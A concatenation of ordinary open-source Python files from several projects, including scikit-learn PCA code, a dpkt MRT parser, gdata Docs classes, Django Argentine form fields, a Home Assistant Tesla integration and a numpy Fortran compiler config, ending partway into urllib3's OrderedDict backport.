                             '2013-07-19 08:47:00', "%Y-%m-%d %H:%M:%S")
                         )
def test_one_where_clause(self):
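        # ISO-8601 timestamps sort lexicographically, so a plain string
        # comparison is enough to select the rows after the cutoff.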
r = np.where(self.df['TimeStamp'] > '2013-07-22 09:48')
print [self.df[i] for i in r]
if __name__ == '__main__':
unittest.main() |
kashif/scikit-learn | refs/heads/master | sklearn/decomposition/base.py | 313 | """Principal Component Analysis Base Classes"""
# Author: Alexandre Gramfort <alexandre.gramfort@inria.fr>
# Olivier Grisel <olivier.grisel@ensta.org>
# Mathieu Blondel <mathieu@mblondel.org>
# Denis A. Engemann <d.engemann@fz-juelich.de>
# Kyle Kastner <kastnerkyle@gmail.com>
#
# License: BSD 3 clause
import numpy as np
from scipy import linalg
from ..base import BaseEstimator, TransformerMixin
from ..utils import check_array
from ..utils.extmath import fast_dot
from ..utils.validation import check_is_fitted
from ..externals import six
from abc import ABCMeta, abstractmethod
class _BasePCA(six.with_metaclass(ABCMeta, BaseEstimator, TransformerMixin)):
"""Base class for PCA methods.
Warning: This class should not be used directly.
Use derived classes instead.
"""
def get_covariance(self):
"""Compute data covariance with the generative model.
``cov = components_.T * S**2 * components_ + sigma2 * eye(n_features)``
where S**2 contains the explained variances, and sigma2 contains the
noise variances.
Returns
-------
cov : array, shape=(n_features, n_features)
Estimated covariance of data.
"""
components_ = self.components_
exp_var = self.explained_variance_
if self.whiten:
components_ = components_ * np.sqrt(exp_var[:, np.newaxis])
exp_var_diff = np.maximum(exp_var - self.noise_variance_, 0.)
cov = np.dot(components_.T * exp_var_diff, components_)
cov.flat[::len(cov) + 1] += self.noise_variance_ # modify diag inplace
return cov
def get_precision(self):
"""Compute data precision matrix with the generative model.
Equals the inverse of the covariance but computed with
the matrix inversion lemma for efficiency.
Returns
-------
precision : array, shape=(n_features, n_features)
Estimated precision of data.
"""
n_features = self.components_.shape[1]
# handle corner cases first
if self.n_components_ == 0:
return np.eye(n_features) / self.noise_variance_
if self.n_components_ == n_features:
return linalg.inv(self.get_covariance())
# Get precision using matrix inversion lemma
components_ = self.components_
exp_var = self.explained_variance_
if self.whiten:
components_ = components_ * np.sqrt(exp_var[:, np.newaxis])
exp_var_diff = np.maximum(exp_var - self.noise_variance_, 0.)
precision = np.dot(components_, components_.T) / self.noise_variance_
precision.flat[::len(precision) + 1] += 1. / exp_var_diff
precision = np.dot(components_.T,
np.dot(linalg.inv(precision), components_))
precision /= -(self.noise_variance_ ** 2)
precision.flat[::len(precision) + 1] += 1. / self.noise_variance_
return precision
@abstractmethod
    def fit(self, X, y=None):
"""Placeholder for fit. Subclasses should implement this method!
Fit the model with X.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Training data, where n_samples is the number of samples and
n_features is the number of features.
Returns
-------
self : object
Returns the instance itself.
"""
def transform(self, X, y=None):
"""Apply dimensionality reduction to X.
X is projected on the first principal components previously extracted
from a training set.
Parameters
----------
X : array-like, shape (n_samples, n_features)
New data, where n_samples is the number of samples
and n_features is the number of features.
Returns
-------
X_new : array-like, shape (n_samples, n_components)
Examples
--------
>>> import numpy as np
>>> from sklearn.decomposition import IncrementalPCA
>>> X = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])
>>> ipca = IncrementalPCA(n_components=2, batch_size=3)
>>> ipca.fit(X)
IncrementalPCA(batch_size=3, copy=True, n_components=2, whiten=False)
>>> ipca.transform(X) # doctest: +SKIP
"""
check_is_fitted(self, ['mean_', 'components_'], all_or_any=all)
X = check_array(X)
if self.mean_ is not None:
X = X - self.mean_
X_transformed = fast_dot(X, self.components_.T)
if self.whiten:
X_transformed /= np.sqrt(self.explained_variance_)
return X_transformed
def inverse_transform(self, X, y=None):
"""Transform data back to its original space.
In other words, return an input X_original whose transform would be X.
Parameters
----------
X : array-like, shape (n_samples, n_components)
New data, where n_samples is the number of samples
and n_components is the number of components.
Returns
-------
X_original array-like, shape (n_samples, n_features)
Notes
-----
If whitening is enabled, inverse_transform will compute the
exact inverse operation, which includes reversing whitening.
"""
if self.whiten:
return fast_dot(X, np.sqrt(self.explained_variance_[:, np.newaxis]) *
self.components_) + self.mean_
else:
return fast_dot(X, self.components_) + self.mean_
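# A hedged sanity-check sketch, not part of the original module: PCA derives
# from _BasePCA, so a fitted model exposes get_covariance()/get_precision(),
# and their product should be close to the identity matrix.
if __name__ == '__main__':
    from sklearn.decomposition import PCA
    rng = np.random.RandomState(0)
    X = rng.randn(100, 5)
    pca = PCA(n_components=2).fit(X)
    cov = pca.get_covariance()        # (5, 5) model covariance
    precision = pca.get_precision()   # its inverse, via the inversion lemma
    print(np.allclose(np.dot(cov, precision), np.eye(5)))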
|
zhakui/QMarkdowner | refs/heads/master | dpkt/mrt.py | 15 | # $Id: mrt.py 29 2007-01-26 02:29:07Z jon.oberheide $
"""Multi-threaded Routing Toolkit."""
import dpkt
import bgp
# Multi-threaded Routing Toolkit
# http://www.ietf.org/internet-drafts/draft-ietf-grow-mrt-03.txt
# MRT Types
NULL = 0
START = 1
DIE = 2
I_AM_DEAD = 3
PEER_DOWN = 4
BGP = 5 # Deprecated by BGP4MP
RIP = 6
IDRP = 7
RIPNG = 8
BGP4PLUS = 9 # Deprecated by BGP4MP
BGP4PLUS_01 = 10 # Deprecated by BGP4MP
OSPF = 11
TABLE_DUMP = 12
BGP4MP = 16
BGP4MP_ET = 17
ISIS = 32
ISIS_ET = 33
OSPF_ET = 64
# BGP4MP Subtypes
BGP4MP_STATE_CHANGE = 0
BGP4MP_MESSAGE = 1
BGP4MP_ENTRY = 2
BGP4MP_SNAPSHOT = 3
BGP4MP_MESSAGE_32BIT_AS = 4
# Address Family Types
AFI_IPv4 = 1
AFI_IPv6 = 2
class MRTHeader(dpkt.Packet):
__hdr__ = (
('ts', 'I', 0),
('type', 'H', 0),
('subtype', 'H', 0),
('len', 'I', 0)
)
class TableDump(dpkt.Packet):
__hdr__ = (
('view', 'H', 0),
('seq', 'H', 0),
('prefix', 'I', 0),
('prefix_len', 'B', 0),
('status', 'B', 1),
('originated_ts', 'I', 0),
('peer_ip', 'I', 0),
('peer_as', 'H', 0),
('attr_len', 'H', 0)
)
def unpack(self, buf):
dpkt.Packet.unpack(self, buf)
plen = self.attr_len
l = []
while plen > 0:
attr = bgp.BGP.Update.Attribute(self.data)
self.data = self.data[len(attr):]
plen -= len(attr)
l.append(attr)
self.attributes = l
class BGP4MPMessage(dpkt.Packet):
__hdr__ = (
('src_as', 'H', 0),
('dst_as', 'H', 0),
('intf', 'H', 0),
('family', 'H', AFI_IPv4),
('src_ip', 'I', 0),
('dst_ip', 'I', 0)
)
class BGP4MPMessage_32(dpkt.Packet):
__hdr__ = (
('src_as', 'I', 0),
('dst_as', 'I', 0),
('intf', 'H', 0),
('family', 'H', AFI_IPv4),
('src_ip', 'I', 0),
('dst_ip', 'I', 0)
)
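# A small round-trip sketch, not part of the original module; it relies on
# generic dpkt.Packet behavior (keyword construction, str() to pack, a
# buffer argument to unpack).
if __name__ == '__main__':
    hdr = MRTHeader(ts=0x12345678, type=BGP4MP, subtype=BGP4MP_MESSAGE, len=0)
    raw = str(hdr)           # pack the 12-byte MRT common header
    parsed = MRTHeader(raw)  # and parse it back from the wire bytes
    assert parsed.type == BGP4MP and parsed.subtype == BGP4MP_MESSAGE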
|
denisff/python-for-android | refs/heads/master | python-build/python-libs/gdata/build/lib/gdata/docs/__init__.py | 263 | #!/usr/bin/python
#
# Copyright 2009 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains extensions to Atom objects used with Google Documents."""
__author__ = ('api.jfisher (Jeff Fisher), '
'api.eric@google.com (Eric Bidelman)')
import atom
import gdata
DOCUMENTS_NAMESPACE = 'http://schemas.google.com/docs/2007'
class Scope(atom.AtomBase):
"""The DocList ACL scope element"""
_tag = 'scope'
_namespace = gdata.GACL_NAMESPACE
_children = atom.AtomBase._children.copy()
_attributes = atom.AtomBase._attributes.copy()
_attributes['value'] = 'value'
_attributes['type'] = 'type'
def __init__(self, value=None, type=None, extension_elements=None,
extension_attributes=None, text=None):
self.value = value
self.type = type
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
class Role(atom.AtomBase):
"""The DocList ACL role element"""
_tag = 'role'
_namespace = gdata.GACL_NAMESPACE
_children = atom.AtomBase._children.copy()
_attributes = atom.AtomBase._attributes.copy()
_attributes['value'] = 'value'
def __init__(self, value=None, extension_elements=None,
extension_attributes=None, text=None):
self.value = value
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
class FeedLink(atom.AtomBase):
"""The DocList gd:feedLink element"""
_tag = 'feedLink'
_namespace = gdata.GDATA_NAMESPACE
_attributes = atom.AtomBase._attributes.copy()
_attributes['rel'] = 'rel'
_attributes['href'] = 'href'
def __init__(self, href=None, rel=None, text=None, extension_elements=None,
extension_attributes=None):
self.href = href
self.rel = rel
atom.AtomBase.__init__(self, extension_elements=extension_elements,
extension_attributes=extension_attributes, text=text)
class ResourceId(atom.AtomBase):
"""The DocList gd:resourceId element"""
_tag = 'resourceId'
_namespace = gdata.GDATA_NAMESPACE
_children = atom.AtomBase._children.copy()
_attributes = atom.AtomBase._attributes.copy()
_attributes['value'] = 'value'
def __init__(self, value=None, extension_elements=None,
extension_attributes=None, text=None):
self.value = value
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
class LastModifiedBy(atom.Person):
"""The DocList gd:lastModifiedBy element"""
_tag = 'lastModifiedBy'
_namespace = gdata.GDATA_NAMESPACE
class LastViewed(atom.Person):
"""The DocList gd:lastViewed element"""
_tag = 'lastViewed'
_namespace = gdata.GDATA_NAMESPACE
class WritersCanInvite(atom.AtomBase):
"""The DocList docs:writersCanInvite element"""
_tag = 'writersCanInvite'
_namespace = DOCUMENTS_NAMESPACE
_attributes = atom.AtomBase._attributes.copy()
_attributes['value'] = 'value'
class DocumentListEntry(gdata.GDataEntry):
"""The Google Documents version of an Atom Entry"""
_tag = gdata.GDataEntry._tag
_namespace = atom.ATOM_NAMESPACE
_children = gdata.GDataEntry._children.copy()
_attributes = gdata.GDataEntry._attributes.copy()
_children['{%s}feedLink' % gdata.GDATA_NAMESPACE] = ('feedLink', FeedLink)
_children['{%s}resourceId' % gdata.GDATA_NAMESPACE] = ('resourceId',
ResourceId)
_children['{%s}lastModifiedBy' % gdata.GDATA_NAMESPACE] = ('lastModifiedBy',
LastModifiedBy)
_children['{%s}lastViewed' % gdata.GDATA_NAMESPACE] = ('lastViewed',
LastViewed)
_children['{%s}writersCanInvite' % DOCUMENTS_NAMESPACE] = (
'writersCanInvite', WritersCanInvite)
def __init__(self, resourceId=None, feedLink=None, lastViewed=None,
lastModifiedBy=None, writersCanInvite=None, author=None,
category=None, content=None, atom_id=None, link=None,
published=None, title=None, updated=None, text=None,
extension_elements=None, extension_attributes=None):
self.feedLink = feedLink
self.lastViewed = lastViewed
self.lastModifiedBy = lastModifiedBy
self.resourceId = resourceId
self.writersCanInvite = writersCanInvite
gdata.GDataEntry.__init__(
self, author=author, category=category, content=content,
atom_id=atom_id, link=link, published=published, title=title,
updated=updated, extension_elements=extension_elements,
extension_attributes=extension_attributes, text=text)
def GetAclLink(self):
"""Extracts the DocListEntry's <gd:feedLink>.
Returns:
A FeedLink object.
"""
return self.feedLink
def GetDocumentType(self):
"""Extracts the type of document from the DocListEntry.
This method returns the type of document the DocListEntry
represents. Possible values are document, presentation,
spreadsheet, folder, or pdf.
Returns:
A string representing the type of document.
"""
if self.category:
for category in self.category:
if category.scheme == gdata.GDATA_NAMESPACE + '#kind':
return category.label
else:
return None
def DocumentListEntryFromString(xml_string):
"""Converts an XML string into a DocumentListEntry object.
Args:
xml_string: string The XML describing a Document List feed entry.
Returns:
A DocumentListEntry object corresponding to the given XML.
"""
return atom.CreateClassFromXMLString(DocumentListEntry, xml_string)
class DocumentListAclEntry(gdata.GDataEntry):
"""A DocList ACL Entry flavor of an Atom Entry"""
_tag = gdata.GDataEntry._tag
_namespace = gdata.GDataEntry._namespace
_children = gdata.GDataEntry._children.copy()
_attributes = gdata.GDataEntry._attributes.copy()
_children['{%s}scope' % gdata.GACL_NAMESPACE] = ('scope', Scope)
_children['{%s}role' % gdata.GACL_NAMESPACE] = ('role', Role)
def __init__(self, category=None, atom_id=None, link=None,
title=None, updated=None, scope=None, role=None,
extension_elements=None, extension_attributes=None, text=None):
gdata.GDataEntry.__init__(self, author=None, category=category,
content=None, atom_id=atom_id, link=link,
published=None, title=title,
updated=updated, text=None)
self.scope = scope
self.role = role
def DocumentListAclEntryFromString(xml_string):
"""Converts an XML string into a DocumentListAclEntry object.
Args:
xml_string: string The XML describing a Document List ACL feed entry.
Returns:
A DocumentListAclEntry object corresponding to the given XML.
"""
return atom.CreateClassFromXMLString(DocumentListAclEntry, xml_string)
class DocumentListFeed(gdata.GDataFeed):
"""A feed containing a list of Google Documents Items"""
_tag = gdata.GDataFeed._tag
_namespace = atom.ATOM_NAMESPACE
_children = gdata.GDataFeed._children.copy()
_attributes = gdata.GDataFeed._attributes.copy()
_children['{%s}entry' % atom.ATOM_NAMESPACE] = ('entry',
[DocumentListEntry])
def DocumentListFeedFromString(xml_string):
"""Converts an XML string into a DocumentListFeed object.
Args:
xml_string: string The XML describing a DocumentList feed.
Returns:
A DocumentListFeed object corresponding to the given XML.
"""
return atom.CreateClassFromXMLString(DocumentListFeed, xml_string)
class DocumentListAclFeed(gdata.GDataFeed):
"""A DocList ACL feed flavor of a Atom feed"""
_tag = gdata.GDataFeed._tag
_namespace = atom.ATOM_NAMESPACE
_children = gdata.GDataFeed._children.copy()
_attributes = gdata.GDataFeed._attributes.copy()
_children['{%s}entry' % atom.ATOM_NAMESPACE] = ('entry',
[DocumentListAclEntry])
def DocumentListAclFeedFromString(xml_string):
"""Converts an XML string into a DocumentListAclFeed object.
Args:
xml_string: string The XML describing a DocumentList feed.
Returns:
A DocumentListFeed object corresponding to the given XML.
"""
return atom.CreateClassFromXMLString(DocumentListAclFeed, xml_string)
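# A hedged usage sketch, not part of the original module. The XML below is
# an illustrative minimal Atom fragment, not real DocList output.
if __name__ == '__main__':
    entry = DocumentListEntryFromString(
        '<entry xmlns="http://www.w3.org/2005/Atom">'
        '<title>Example doc</title></entry>')
    print entry.title.text  # -> Example doc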
|
davidzchen/tensorflow | refs/heads/master | tensorflow/python/estimator/canned/head.py | 40 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""head python module.
Importing from tensorflow.python.estimator is unsupported
and will soon break!
"""
# pylint: disable=unused-import,g-bad-import-order,g-import-not-at-top,wildcard-import
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow_estimator.python.estimator.canned import head
# Include attrs that start with single underscore.
_HAS_DYNAMIC_ATTRIBUTES = True
head.__all__ = [s for s in dir(head) if not s.startswith('__')]
from tensorflow_estimator.python.estimator.canned.head import *
|
potatolondon/django-nonrel-1-4 | refs/heads/master | django/contrib/localflavor/ar/forms.py | 87 | # -*- coding: utf-8 -*-
"""
AR-specific Form helpers.
"""
from __future__ import absolute_import
from django.contrib.localflavor.ar.ar_provinces import PROVINCE_CHOICES
from django.core.validators import EMPTY_VALUES
from django.forms import ValidationError
from django.forms.fields import RegexField, CharField, Select
from django.utils.translation import ugettext_lazy as _
class ARProvinceSelect(Select):
"""
A Select widget that uses a list of Argentinean provinces/autonomous cities
as its choices.
"""
def __init__(self, attrs=None):
super(ARProvinceSelect, self).__init__(attrs, choices=PROVINCE_CHOICES)
class ARPostalCodeField(RegexField):
"""
A field that accepts a 'classic' NNNN Postal Code or a CPA.
See http://www.correoargentino.com.ar/consulta_cpa/home.php
"""
default_error_messages = {
'invalid': _("Enter a postal code in the format NNNN or ANNNNAAA."),
}
def __init__(self, max_length=8, min_length=4, *args, **kwargs):
super(ARPostalCodeField, self).__init__(r'^\d{4}$|^[A-HJ-NP-Za-hj-np-z]\d{4}\D{3}$',
max_length, min_length, *args, **kwargs)
def clean(self, value):
value = super(ARPostalCodeField, self).clean(value)
if value in EMPTY_VALUES:
return u''
if len(value) not in (4, 8):
raise ValidationError(self.error_messages['invalid'])
if len(value) == 8:
return u'%s%s%s' % (value[0].upper(), value[1:5], value[5:].upper())
return value
class ARDNIField(CharField):
"""
A field that validates 'Documento Nacional de Identidad' (DNI) numbers.
"""
default_error_messages = {
'invalid': _("This field requires only numbers."),
'max_digits': _("This field requires 7 or 8 digits."),
}
def __init__(self, max_length=10, min_length=7, *args, **kwargs):
super(ARDNIField, self).__init__(max_length, min_length, *args,
**kwargs)
def clean(self, value):
"""
Value can be a string either in the [X]X.XXX.XXX or [X]XXXXXXX formats.
"""
value = super(ARDNIField, self).clean(value)
if value in EMPTY_VALUES:
return u''
if not value.isdigit():
value = value.replace('.', '')
if not value.isdigit():
raise ValidationError(self.error_messages['invalid'])
if len(value) not in (7, 8):
raise ValidationError(self.error_messages['max_digits'])
return value
class ARCUITField(RegexField):
"""
This field validates a CUIT (Código Único de Identificación Tributaria). A
CUIT is of the form XX-XXXXXXXX-V. The last digit is a check digit.
"""
default_error_messages = {
'invalid': _('Enter a valid CUIT in XX-XXXXXXXX-X or XXXXXXXXXXXX format.'),
'checksum': _("Invalid CUIT."),
}
def __init__(self, max_length=None, min_length=None, *args, **kwargs):
super(ARCUITField, self).__init__(r'^\d{2}-?\d{8}-?\d$',
max_length, min_length, *args, **kwargs)
def clean(self, value):
"""
Value can be either a string in the format XX-XXXXXXXX-X or an
11-digit number.
"""
value = super(ARCUITField, self).clean(value)
if value in EMPTY_VALUES:
return u''
value, cd = self._canon(value)
if self._calc_cd(value) != cd:
raise ValidationError(self.error_messages['checksum'])
return self._format(value, cd)
def _canon(self, cuit):
cuit = cuit.replace('-', '')
return cuit[:-1], cuit[-1]
def _calc_cd(self, cuit):
mults = (5, 4, 3, 2, 7, 6, 5, 4, 3, 2)
tmp = sum([m * int(cuit[idx]) for idx, m in enumerate(mults)])
return str(11 - tmp % 11)
def _format(self, cuit, check_digit=None):
        if check_digit is None:
check_digit = cuit[-1]
cuit = cuit[:-1]
return u'%s-%s-%s' % (cuit[:2], cuit[2:], check_digit)
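# A standalone sketch of the mod-11 arithmetic behind ARCUITField._calc_cd,
# not part of the original module; the sample CUIT below is made up.
if __name__ == '__main__':
    cuit = '20267565393'  # 10 digits plus a trailing check digit
    mults = (5, 4, 3, 2, 7, 6, 5, 4, 3, 2)
    total = sum(m * int(d) for m, d in zip(mults, cuit[:10]))
    print str(11 - total % 11) == cuit[-1]  # True for a valid check digit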
|
nkgilley/home-assistant | refs/heads/dev | homeassistant/components/tesla/__init__.py | 2 | """Support for Tesla cars."""
import asyncio
from collections import defaultdict
import logging
from teslajsonpy import Controller as TeslaAPI, TeslaException
import voluptuous as vol
from homeassistant.config_entries import SOURCE_IMPORT
from homeassistant.const import (
ATTR_BATTERY_CHARGING,
ATTR_BATTERY_LEVEL,
CONF_ACCESS_TOKEN,
CONF_PASSWORD,
CONF_SCAN_INTERVAL,
CONF_TOKEN,
CONF_USERNAME,
)
from homeassistant.core import callback
from homeassistant.helpers import aiohttp_client, config_validation as cv
from homeassistant.helpers.entity import Entity
from homeassistant.util import slugify
from .config_flow import (
CannotConnect,
InvalidAuth,
configured_instances,
validate_input,
)
from .const import (
CONF_WAKE_ON_START,
DATA_LISTENER,
DEFAULT_SCAN_INTERVAL,
DEFAULT_WAKE_ON_START,
DOMAIN,
ICONS,
MIN_SCAN_INTERVAL,
TESLA_COMPONENTS,
)
_LOGGER = logging.getLogger(__name__)
CONFIG_SCHEMA = vol.Schema(
{
DOMAIN: vol.Schema(
{
vol.Required(CONF_USERNAME): cv.string,
vol.Required(CONF_PASSWORD): cv.string,
vol.Optional(
CONF_SCAN_INTERVAL, default=DEFAULT_SCAN_INTERVAL
): vol.All(cv.positive_int, vol.Clamp(min=MIN_SCAN_INTERVAL)),
}
)
},
extra=vol.ALLOW_EXTRA,
)
@callback
def _async_save_tokens(hass, config_entry, access_token, refresh_token):
hass.config_entries.async_update_entry(
config_entry,
data={
**config_entry.data,
CONF_ACCESS_TOKEN: access_token,
CONF_TOKEN: refresh_token,
},
)
async def async_setup(hass, base_config):
"""Set up of Tesla component."""
def _update_entry(email, data=None, options=None):
data = data or {}
options = options or {
CONF_SCAN_INTERVAL: DEFAULT_SCAN_INTERVAL,
CONF_WAKE_ON_START: DEFAULT_WAKE_ON_START,
}
for entry in hass.config_entries.async_entries(DOMAIN):
if email != entry.title:
continue
hass.config_entries.async_update_entry(entry, data=data, options=options)
config = base_config.get(DOMAIN)
if not config:
return True
email = config[CONF_USERNAME]
password = config[CONF_PASSWORD]
scan_interval = config[CONF_SCAN_INTERVAL]
if email in configured_instances(hass):
try:
info = await validate_input(hass, config)
except (CannotConnect, InvalidAuth):
return False
_update_entry(
email,
data={
CONF_ACCESS_TOKEN: info[CONF_ACCESS_TOKEN],
CONF_TOKEN: info[CONF_TOKEN],
},
options={CONF_SCAN_INTERVAL: scan_interval},
)
else:
hass.async_create_task(
hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_IMPORT},
data={CONF_USERNAME: email, CONF_PASSWORD: password},
)
)
hass.data.setdefault(DOMAIN, {})
hass.data[DOMAIN][email] = {CONF_SCAN_INTERVAL: scan_interval}
return True
async def async_setup_entry(hass, config_entry):
"""Set up Tesla as config entry."""
hass.data.setdefault(DOMAIN, {})
config = config_entry.data
websession = aiohttp_client.async_get_clientsession(hass)
email = config_entry.title
if email in hass.data[DOMAIN] and CONF_SCAN_INTERVAL in hass.data[DOMAIN][email]:
scan_interval = hass.data[DOMAIN][email][CONF_SCAN_INTERVAL]
hass.config_entries.async_update_entry(
config_entry, options={CONF_SCAN_INTERVAL: scan_interval}
)
hass.data[DOMAIN].pop(email)
try:
controller = TeslaAPI(
websession,
refresh_token=config[CONF_TOKEN],
access_token=config[CONF_ACCESS_TOKEN],
update_interval=config_entry.options.get(
CONF_SCAN_INTERVAL, DEFAULT_SCAN_INTERVAL
),
)
(refresh_token, access_token) = await controller.connect(
wake_if_asleep=config_entry.options.get(
CONF_WAKE_ON_START, DEFAULT_WAKE_ON_START
)
)
except TeslaException as ex:
_LOGGER.error("Unable to communicate with Tesla API: %s", ex.message)
return False
_async_save_tokens(hass, config_entry, access_token, refresh_token)
entry_data = hass.data[DOMAIN][config_entry.entry_id] = {
"controller": controller,
"devices": defaultdict(list),
DATA_LISTENER: [config_entry.add_update_listener(update_listener)],
}
_LOGGER.debug("Connected to the Tesla API.")
all_devices = entry_data["controller"].get_homeassistant_components()
if not all_devices:
return False
for device in all_devices:
entry_data["devices"][device.hass_type].append(device)
for component in TESLA_COMPONENTS:
_LOGGER.debug("Loading %s", component)
hass.async_create_task(
hass.config_entries.async_forward_entry_setup(config_entry, component)
)
return True
async def async_unload_entry(hass, config_entry) -> bool:
"""Unload a config entry."""
await asyncio.gather(
*[
hass.config_entries.async_forward_entry_unload(config_entry, component)
for component in TESLA_COMPONENTS
]
)
for listener in hass.data[DOMAIN][config_entry.entry_id][DATA_LISTENER]:
listener()
username = config_entry.title
hass.data[DOMAIN].pop(config_entry.entry_id)
_LOGGER.debug("Unloaded entry for %s", username)
return True
async def update_listener(hass, config_entry):
"""Update when config_entry options update."""
controller = hass.data[DOMAIN][config_entry.entry_id]["controller"]
old_update_interval = controller.update_interval
controller.update_interval = config_entry.options.get(CONF_SCAN_INTERVAL)
_LOGGER.debug(
"Changing scan_interval from %s to %s",
old_update_interval,
controller.update_interval,
)
class TeslaDevice(Entity):
"""Representation of a Tesla device."""
def __init__(self, tesla_device, controller, config_entry):
"""Initialise the Tesla device."""
self.tesla_device = tesla_device
self.controller = controller
self.config_entry = config_entry
self._name = self.tesla_device.name
self.tesla_id = slugify(self.tesla_device.uniq_name)
self._attributes = {}
self._icon = ICONS.get(self.tesla_device.type)
@property
def name(self):
"""Return the name of the device."""
return self._name
@property
def unique_id(self) -> str:
"""Return a unique ID."""
return self.tesla_id
@property
def icon(self):
"""Return the icon of the sensor."""
return self._icon
@property
def should_poll(self):
"""Return the polling state."""
return self.tesla_device.should_poll
@property
def device_state_attributes(self):
"""Return the state attributes of the device."""
attr = self._attributes
if self.tesla_device.has_battery():
attr[ATTR_BATTERY_LEVEL] = self.tesla_device.battery_level()
attr[ATTR_BATTERY_CHARGING] = self.tesla_device.battery_charging()
return attr
@property
def device_info(self):
"""Return the device_info of the device."""
return {
"identifiers": {(DOMAIN, self.tesla_device.id())},
"name": self.tesla_device.car_name(),
"manufacturer": "Tesla",
"model": self.tesla_device.car_type,
"sw_version": self.tesla_device.car_version,
}
async def async_added_to_hass(self):
"""Register state update callback."""
async def async_will_remove_from_hass(self):
"""Prepare for unload."""
async def async_update(self):
"""Update the state of the device."""
if self.controller.is_token_refreshed():
(refresh_token, access_token) = self.controller.get_tokens()
_async_save_tokens(
self.hass, self.config_entry, access_token, refresh_token
)
_LOGGER.debug("Saving new tokens in config_entry")
await self.tesla_device.async_update()
|
mdanielwork/intellij-community | refs/heads/master | python/testData/quickFixes/PyAsyncCallQuickFixTest/addYieldFromBeforeCall_after.py | 18 | import asyncio
@asyncio.coroutine
def bar():
yield from asyncio.sleep(2)
return "hey"
@asyncio.coroutine
def foo():
yield from bar()
return True
|
ahaldane/numpy | refs/heads/master | numpy/distutils/fcompiler/ibm.py | 8 | from __future__ import division, absolute_import, print_function
import os
import re
import sys
import subprocess
from numpy.distutils.fcompiler import FCompiler
from numpy.distutils.exec_command import find_executable
from numpy.distutils.misc_util import make_temp_file
from distutils import log
compilers = ['IBMFCompiler']
class IBMFCompiler(FCompiler):
compiler_type = 'ibm'
description = 'IBM XL Fortran Compiler'
version_pattern = r'(xlf\(1\)\s*|)IBM XL Fortran ((Advanced Edition |)Version |Enterprise Edition V|for AIX, V)(?P<version>[^\s*]*)'
#IBM XL Fortran Enterprise Edition V10.1 for AIX \nVersion: 10.01.0000.0004
executables = {
'version_cmd' : ["<F77>", "-qversion"],
'compiler_f77' : ["xlf"],
'compiler_fix' : ["xlf90", "-qfixed"],
'compiler_f90' : ["xlf90"],
'linker_so' : ["xlf95"],
'archiver' : ["ar", "-cr"],
'ranlib' : ["ranlib"]
}
def get_version(self,*args,**kwds):
version = FCompiler.get_version(self,*args,**kwds)
if version is None and sys.platform.startswith('aix'):
# use lslpp to find out xlf version
lslpp = find_executable('lslpp')
xlf = find_executable('xlf')
if os.path.exists(xlf) and os.path.exists(lslpp):
try:
o = subprocess.check_output([lslpp, '-Lc', 'xlfcmp'])
except (OSError, subprocess.CalledProcessError):
pass
else:
m = re.search(r'xlfcmp:(?P<version>\d+([.]\d+)+)', o)
if m: version = m.group('version')
xlf_dir = '/etc/opt/ibmcmp/xlf'
if version is None and os.path.isdir(xlf_dir):
# linux:
# If the output of xlf does not contain version info
# (that's the case with xlf 8.1, for instance) then
# let's try another method:
l = sorted(os.listdir(xlf_dir))
l.reverse()
l = [d for d in l if os.path.isfile(os.path.join(xlf_dir, d, 'xlf.cfg'))]
if l:
from distutils.version import LooseVersion
self.version = version = LooseVersion(l[0])
return version
def get_flags(self):
return ['-qextname']
def get_flags_debug(self):
return ['-g']
def get_flags_linker_so(self):
opt = []
if sys.platform=='darwin':
opt.append('-Wl,-bundle,-flat_namespace,-undefined,suppress')
else:
opt.append('-bshared')
version = self.get_version(ok_status=[0, 40])
if version is not None:
if sys.platform.startswith('aix'):
xlf_cfg = '/etc/xlf.cfg'
else:
xlf_cfg = '/etc/opt/ibmcmp/xlf/%s/xlf.cfg' % version
fo, new_cfg = make_temp_file(suffix='_xlf.cfg')
log.info('Creating '+new_cfg)
with open(xlf_cfg, 'r') as fi:
crt1_match = re.compile(r'\s*crt\s*[=]\s*(?P<path>.*)/crt1.o').match
for line in fi:
m = crt1_match(line)
if m:
fo.write('crt = %s/bundle1.o\n' % (m.group('path')))
else:
fo.write(line)
fo.close()
opt.append('-F'+new_cfg)
return opt
def get_flags_opt(self):
return ['-O3']
if __name__ == '__main__':
from numpy.distutils import customized_fcompiler
log.set_verbosity(2)
print(customized_fcompiler(compiler='ibm').get_version())
|
mattvenn/Arduino | refs/heads/esp8266 | arduino-core/src/processing/app/i18n/python/requests/packages/urllib3/packages/ordered_dict.py | 1093 | # Backport of OrderedDict() class that runs on Python 2.4, 2.5, 2.6, 2.7 and pypy.
# Passes Python2.7's test suite and incorporates all the latest updates.
# Copyright 2009 Raymond Hettinger, released under the MIT License.
# http://code.activestate.com/recipes/576693/
try:
from thread import get_ident as _get_ident
except ImportError:
from dummy_thread import get_ident as _get_ident
try:
from _abcoll import KeysView, ValuesView, ItemsView
except ImportError:
pass
class OrderedDict(dict):
'Dictionary that remembers insertion order'
# An inherited dict maps keys to values.
# The inherited dict provides __getitem__, __len__, __contains__, and get.
# The remaining methods are order-aware.
# Big-O running times for all methods are the same as for regular dictionaries.
# The internal self.__map dictionary maps keys to links in a doubly linked list.
# The circular doubly linked list starts and ends with a sentinel element.
